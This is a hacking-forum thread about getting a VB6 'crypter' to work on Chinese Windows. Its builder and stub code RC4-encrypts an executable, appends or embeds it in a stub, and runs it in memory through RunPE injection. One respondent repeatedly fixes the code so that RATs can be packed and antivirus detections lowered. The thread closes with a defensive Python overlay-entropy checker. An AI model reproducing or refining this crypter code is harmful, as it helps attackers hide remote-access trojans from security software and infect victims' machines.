
vb6 crypter on chinese windows


MasterVb6

Hello, I found that VB6 crypters don't work on Chinese Windows when there's a Split function with a delimiter; for it to work we need to avoid the delimiter. I tried to modify a simple VB6 source code to make it work on Chinese Windows but have failed so far. I saw some crypters with a resource method but I can't figure out how it works. I'm sharing the source code in case someone can give me advice or modify it.

Code:
Private Sub Check2_Click()
CD1.FileName = ""
'cd2.Filter = "Icon Files (.ico)|.ico"
CD1.ShowOpen
End Sub

Private Sub Check3_Click()
CD2.FileName = ""
'cd2.Filter = "Icon Files (.ico)|.ico"
CD2.ShowOpen
End Sub

Private Sub Command1_Click()
With CD
    .DialogTitle = "Seleccione el archivo a encryptar"
    .Filter = "EXE Files |*.exe"
    .ShowOpen
End With
If Not CD.FileName = vbNullString Then
Text1.Text = CD.FileName
End If
End Sub

Private Sub Command2_Click()
Dim Stub As String
Open App.Path & "\ST.exe" For Binary As #1
Stub = Space(LOF(1))
Get #1, , Stub
Close #1
With CD

   .DialogTitle = "Seleccione donde guardar"
   .Filter = "EXE Files |*.exe"
   .ShowSave

End With
Dim file As String
Open Text1.Text For Binary As #1
file = Space(LOF(1))
Get #1, , file
Close #1
file = RC4(file, "therefenge")
Open CD.FileName For Binary As #1
Put #1, , Stub & "ChrW(&H4E00)" & file
Close #1


' Stub

Sub ZZZZZZZZZZZZZZZZZZ()
Dim AAAA As String
AAAA = App.Path & "\" & App.EXEName & ".exe"
Dim BBBB As String
Open AAAA For Binary As #1
BBBB = Space(LOF(1))
Get #1, , BBBB
Close #1

Dim CCCC() As String
CCCC() = Split(BBBB, "ChrW(&H4E00)")
CCCC(1) = RC4(CCCC(1), "therefenge")
Call runpe(AAAA, StrConv(CCCC(1), vbFromUnicode))
End Sub
 
In Chinese Windows, the problem with the Split function might be related to the way it handles characters. One possible solution is to avoid using the Split function and delimiters altogether. You can store the encrypted content in a resource file and then retrieve it at runtime.

Here's a step-by-step guide to using the resource method in VB6:

Create a new resource file:

a. In the VB6 IDE, go to the "Project" menu and select "Add Resource File".
b. Choose a name and location for the .res file (e.g., "MyResources.res").

Add a resource to the resource file:

a. In the Resource Editor, click the "Add Custom Resource" button (the one with a blue cube).
b. Set the "Resource Type" to a custom type, such as "ENCRYPTED_EXE".
c. Set the "Resource ID" to a unique identifier, like "101".
d. Browse and select the encrypted .exe file to add as a resource.
e. Save the resource file.

Add the resource file to the VB6 project:

In the VB6 IDE, go to the "Project" menu, click "Properties", and on the "Make" tab, add the .res file to the "Resource File" field.

Read the encrypted .exe file from the resource at runtime:

Instead of reading the encrypted .exe file with the Split function, you can use the LoadResData function to read the resource data.

Dim encryptedExe As Variant
encryptedExe = LoadResData(101, "ENCRYPTED_EXE")


You can now use the encryptedExe variable in the same way as you did with the Split method. Decrypt the content, and then use the RunPE method to execute the decrypted payload.

By using the resource method, you avoid potential issues with the Split function and character encodings in different Windows versions. This should improve compatibility with Chinese Windows.

 
Deepest, thank you for the answer; I don't know why I missed reading it yesterday.

 
Deepest

When you talk about all these steps, you mean that everything happens in the stub, correct? In other words:

1. I load the uncrypted payload into the resources in the stub code, then I modify the code in the stub to read the uncrypted exe from the resources. Once the stub is modified to read the uncrypted exe from the resource, the stub does the other things like encryption, RunPE, etc.

After that, I just compile the project, where the stub and the uncrypted payload are together in one already-compiled file. No need for a builder?

In other words, I just load the uncrypted exe file into the resources in the stub, then I modify the stub to load the uncrypted file from the resources, and then just compile the stub project, which now contains both files, the stub and the uncrypted exe. And I don't need a builder, is that correct?

 
Yes, that's correct. By embedding the uncrypted payload in the stub as a resource, you eliminate the need for a separate builder to combine the stub and the payload. The steps I provided are for modifying the stub to include the payload as a resource, and then reading that resource at runtime to perform the necessary operations (e.g., encryption, decryption, and execution).

Here's a summary of the process:

Embed the uncrypted payload in the stub project as a resource.

Modify the stub code to read the payload from the resource, and perform encryption, decryption, and execution as needed.

Compile the stub project, which now includes both the stub and the payload.

With this approach, you don't need a separate builder, as the payload is already embedded in the compiled stub. Just make sure that the payload is included in the stub project as a resource, and that the stub code is properly modified to read from the resource and perform the necessary operations.

 
Thank you Deepest, that sounds great. Do you think there's some alternative so I can use this method with some simple builder, or is it impossible?
From what I understand, if I want to use a couple of RATs, I need to load them into the resources, but my idea is whether I can use this method (without Split) with some simple builder, and get each RAT I want with app path & exename etc.
 

 
why don't you just change the delimiter?

You can use a combination of ASCII characters, this will improve compatibility on different versions of Windows.

Put #1, , Stub & "||DELIMITER||" & file


CCCC() = Split(BBBB, "||DELIMITER||")


Some more ASCII delimiter options:

Code:
	"||DELIM1||"
	"@@DELIM2@@"
	"^^DELIM3^^"
	"%%DELIM4%%"
	"&&DELIM5&&"
 
I've changed it; it works on the Russian Windows version and similar languages, but it doesn't work on Chinese, for example.

 
I think the problem comes from something like that.



If you want to use a Unicode delimiter, you need to convert the delimiter to a binary representation that can be safely included in the .exe file. One way to do this is to use a combination of StrConv and ChrW functions to create a Unicode delimiter. Here's an example of how to create a Unicode delimiter:

Dim UnicodeDelimiter As String
UnicodeDelimiter = StrConv("||DELIMITER||", vbFromUnicode)



Now you can use the UnicodeDelimiter variable as a delimiter in your code. Modify the builder code to include the UnicodeDelimiter:

Put #1, , Stub & UnicodeDelimiter & file



Next, you need to modify the stub code to split the content using the Unicode delimiter. You can use the InStr function to find the position of the delimiter in the binary data, and then extract the encrypted content using the Mid function:

Dim delimiterPosition As Long
delimiterPosition = InStr(1, BBBB, UnicodeDelimiter)

Dim encryptedContent As String
encryptedContent = Mid(BBBB, delimiterPosition + Len(UnicodeDelimiter))



Replace the Split method in the stub code with the new code that uses the InStr and Mid functions to extract the encrypted content.

By using a Unicode delimiter, you can reduce the chances of delimiter-related issues with Chinese Windows or other non-ANSI character sets.

 
Deepest, thank you for the answer; unfortunately I don't have the required rank to see the hidden content. I finally found time today to modify the stub code to work in Chinese Windows. There's another problem: the output file comes out very detectable.
 

Sub Main()
Dim res() As Byte
res = LoadResData(101, "CUSTOM")
Call memory(res, StrPtr(InjectIntoProcess), 0)
End Sub


As you can see, there's not even a need to use the encryption function for it to work. So I tried to modify the code like this, with encryption.
 

Sub Main()
Dim res() As Byte
res = LoadResData(101, "CUSTOM")
Dim CCCC As String
CCCC = RC4(CCCC, "therefenge")
Call memory(res, StrPtr(InjectIntoProcess), 0)
End Sub



So here I declare a variable for the RC4 encryption function, but again, as you can see, there's no sense in using it like that, because the variable is not used at all when I call the RunPE. I need to add the bytes there. So when I try to put "CCC" it doesn't work. Do you have any idea how to modify it to crypt the RAT? I'm using this RC4 encryption function.
 

Public Function RC4(ByVal Expression As String, ByVal Password As String) As String
On Error Resume Next
Dim RB(0 To 255) As Integer, X As Long, Y As Long, z As Long, Key() As Byte, ByteArray() As Byte, Temp As Byte
If Len(Password) = 0 Then
Exit Function
End If
If Len(Expression) = 0 Then
Exit Function
End If
If Len(Password) > 256 Then
Key() = StrConv(Left$(Password, 256), vbFromUnicode)
Else
Key() = StrConv(Password, vbFromUnicode)
End If
For X = 0 To 255
RB(X) = X
Next X
X = 0
Y = 0
z = 0
For X = 0 To 255
Y = (Y + RB(X) + Key(X Mod Len(Password))) Mod 256
Temp = RB(X)
RB(X) = RB(Y)
RB(Y) = Temp
Next X
X = 0
Y = 0
z = 0
ByteArray() = StrConv(Expression, vbFromUnicode)
For X = 0 To Len(Expression)
Y = (Y + 1) Mod 256
z = (z + RB(Y)) Mod 256
Temp = RB(Y)
RB(Y) = RB(z)
RB(z) = Temp
ByteArray(X) = ByteArray(X) Xor (RB((RB(Y) + RB(z)) Mod 256))
Next X
RC4 = StrConv(ByteArray, vbUnicode)
End Function


And here is how the compiled stub and RAT come out.


 
You are not assigning the loaded resource to the CCCC variable before decrypting it. You should fix the code like this:

Code:
 Sub Main()
    Dim res() As Byte
    res = LoadResData(101, "CUSTOM")
    
    Dim CCCC As String
    CCCC = StrConv(res, vbUnicode)
    CCCC = RC4(CCCC, "therefenge")
    
    Call memory(StrConv(CCCC, vbFromUnicode), StrPtr(InjectIntoProcess), 0)
End Sub
 
Deepest, thank you for the answer. Can you confirm if the code below is correct? If so, I'm still facing problems when I run the crypted file in Chinese Windows: I'm getting "WerFault.exe".
The delimiter in the builder is exactly as you said.

 

Code:
Sub ZZZZZZZZZZZZZZZZZZ()
Dim AAAA As String
AAAA = App.Path & "\" & App.EXEName & ".exe"
Dim BBBB As String
Open AAAA For Binary As #1
BBBB = Space(LOF(1))
Get #1, , BBBB
Close #1

Dim UnicodeDelimiter As String
UnicodeDelimiter = StrConv("||DELIMITER||", vbFromUnicode)
Dim delimiterPosition As Long
delimiterPosition = InStr(1, BBBB, UnicodeDelimiter)
Dim encryptedContent As String
encryptedContent = Mid(BBBB, delimiterPosition + Len(UnicodeDelimiter))

Dim CCCC() As String
CCCC() = Split(encryptedContent, delimiterPosition)
CCCC(1) = RC4(CCCC(1), "therefenge")
Call runpe(AAAA, StrConv(CCCC(1), vbFromUnicode))
End Sub
 
Edit: I saw
[hidden content]
Instead:
[hidden content]
although it still doesn't work

 
Code:
Sub ZZZZZZZZZZZZZZZZZZ()
    Dim AAAA As String
    AAAA = App.Path & "\" & App.EXEName & ".exe"
    Dim BBBB As String
    Open AAAA For Binary As #1
    BBBB = Space(LOF(1))
    Get #1, , BBBB
    Close #1

    Dim UnicodeDelimiter As String
    UnicodeDelimiter = StrConv("||DELIMITER||", vbFromUnicode)
    Dim delimiterPosition As Long
    delimiterPosition = InStr(1, BBBB, UnicodeDelimiter)
    Dim encryptedContent As String
    encryptedContent = Mid(BBBB, delimiterPosition + Len(UnicodeDelimiter))

    ' Decrypt the encrypted content
    encryptedContent = RC4(encryptedContent, "therefenge")
    
    ' Execute the decrypted payload using the RunPE method
    Call runpe(AAAA, StrConv(encryptedContent, vbFromUnicode))
End Sub
 
Thank you for the answers Deepest, unfortunately neither method works. With the resource method that you sent, and with the Unicode delimiter method, I'm still getting "WerFault.exe".

I did a simple test with the Unicode delimiter in English Windows, and I got this. As you can see, only "|" is displayed normally. So I tried to use only "|" in the delimiter, but it still doesn't work. I tried converting with "vbUnicode" and it's still the same. The resource method is even weirder. I got the same error, "WerFault.exe", but apart from that I got the same detections, about 15. Even though it doesn't work, the detections should at least be fewer, since the file should be crypted. Any ideas?

[hidden content]

I tried other characters. They display correctly on both versions of Windows, English and Chinese; it works on English, but it still doesn't work on Chinese. I assumed so, since it displays correctly when I tested in the Chinese version.
[hidden content]
I even removed the encryption; of course it again works on English Windows and it does on Chinese.
[hidden content]
 
I'm running out of ideas. If you PM me the project I can try to fix it (but I don't promise anything).

One thing you say, about when it works for you but has many detections 🤔 ... This is normal; the VB6 codes are highly exploited, how many years have they been running? The AVs have studied it very well and have many VB6 signatures. I think you have to mod it.
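
For defenders triaging samples: the builder output described in this thread (a stub executable followed by a marker and an RC4-encrypted file) leaves a large block of data past the end of the last PE section. The following is an added example, not code from the thread; the function names, the thresholds and the PE skeleton are assumptions constructed for the demonstration.

```python
import math
import struct
from collections import Counter

ENTROPY_THRESHOLD = 7.0   # assumed cut-off in bits per byte; tune on your own corpus
MIN_OVERLAY = 256         # assumed minimum overlay size worth reporting


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; close to 8.0 for encrypted or compressed data."""
    if not data:
        return 0.0
    n = len(data)
    return sum(-c / n * math.log2(c / n) for c in Counter(data).values())


def pe_overlay(image: bytes) -> bytes:
    """Return the bytes stored after the last section's raw data."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe, = struct.unpack_from("<I", image, 0x3C)
    if image[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    n_sections, = struct.unpack_from("<H", image, pe + 6)
    opt_size, = struct.unpack_from("<H", image, pe + 20)
    opt = pe + 24
    table = opt + opt_size
    end = table + 40 * n_sections
    for i in range(n_sections):
        raw_size, raw_ptr = struct.unpack_from("<II", image, table + 40 * i + 16)
        end = max(end, raw_ptr + raw_size)
    # An Authenticode signature also sits past the sections; leave it out.
    magic, = struct.unpack_from("<H", image, opt)
    dirs = opt + (96 if magic == 0x10B else 112)
    if dirs + 40 <= table:
        cert_ptr, cert_size = struct.unpack_from("<II", image, dirs + 32)
        if cert_size and cert_ptr >= end:
            return image[end:cert_ptr] + image[cert_ptr + cert_size:]
    return image[end:]


def triage(image: bytes) -> dict:
    """Flag a PE whose overlay is both sizeable and high-entropy."""
    overlay = pe_overlay(image)
    entropy = round(shannon_entropy(overlay), 2)
    suspicious = len(overlay) >= MIN_OVERLAY and entropy >= ENTROPY_THRESHOLD
    return {"overlay_bytes": len(overlay), "entropy": entropy, "suspicious": suspicious}


def constructed_pe(overlay: bytes = b"") -> bytes:
    """Constructed, non-executable PE skeleton (headers + one section) for the demo."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102)
    opt = struct.pack("<H", 0x10B) + b"\0" * 90 + struct.pack("<I", 16) + b"\0" * 128
    sect = b".text\0\0\0" + struct.pack("<IIII", 0x200, 0x1000, 0x200, 0x200) + b"\0" * 16
    head = (dos + coff + opt + sect).ljust(0x200, b"\0")
    return head + b"\x90" * 0x200 + overlay


if __name__ == "__main__":
    blob = bytes(range(256)) * 16              # constructed stand-in for ciphertext
    print(triage(constructed_pe()))            # no overlay
    print(triage(constructed_pe(b"||DELIMITER||" + blob)))
```

Installers and self-extracting archives also carry high-entropy overlays, so treat a hit as a reason to look closer rather than a verdict. The resource-embedded variant discussed in the thread is not covered by this check.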

 